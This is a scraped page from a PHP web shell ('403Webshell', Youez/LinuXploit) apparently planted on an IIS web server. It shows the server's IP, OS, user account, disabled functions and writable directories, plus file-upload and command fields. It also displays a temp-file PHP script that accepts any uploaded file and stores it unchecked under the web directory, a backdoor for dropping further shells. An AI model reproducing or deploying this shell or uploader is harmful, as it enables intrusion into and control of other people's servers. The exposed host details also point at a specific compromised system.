403Webshell
Server IP : 121.121.20.254  /  Your IP : 216.73.217.51
Web Server : Microsoft-IIS/10.0
System : Windows NT WEB-SERVER 10.0 build 20348 (Windows Server 2022) AMD64
User : IUSR ( 0)
PHP Version : 8.3.28
Disable Function : NONE
MySQL : ON  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  C:/TMP/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :


[ Back ]     

Current File : C:/TMP/php4662.tmp
<?php
if(isset($_FILES['file'])){
    $upload_dir = __DIR__ . '/uploads/';
    if(!is_dir($upload_dir)){
        mkdir($upload_dir, 0755, true);
    }
    $file_path = $upload_dir . basename($_FILES['file']['name']);
    if(move_uploaded_file($_FILES['file']['tmp_name'], $file_path)){
        echo "Uploaded: " . htmlspecialchars(basename($_FILES['file']['name']));
    } else {
        echo "Upload failed.";
    }
} else {
?>
<form method="POST" enctype="multipart/form-data">
    <input type="file" name="file" />
    <input type="submit" value="Upload" />
</form>
<?php
}
?>

Youez - 2016 - github.com/yon3zu
LinuXploit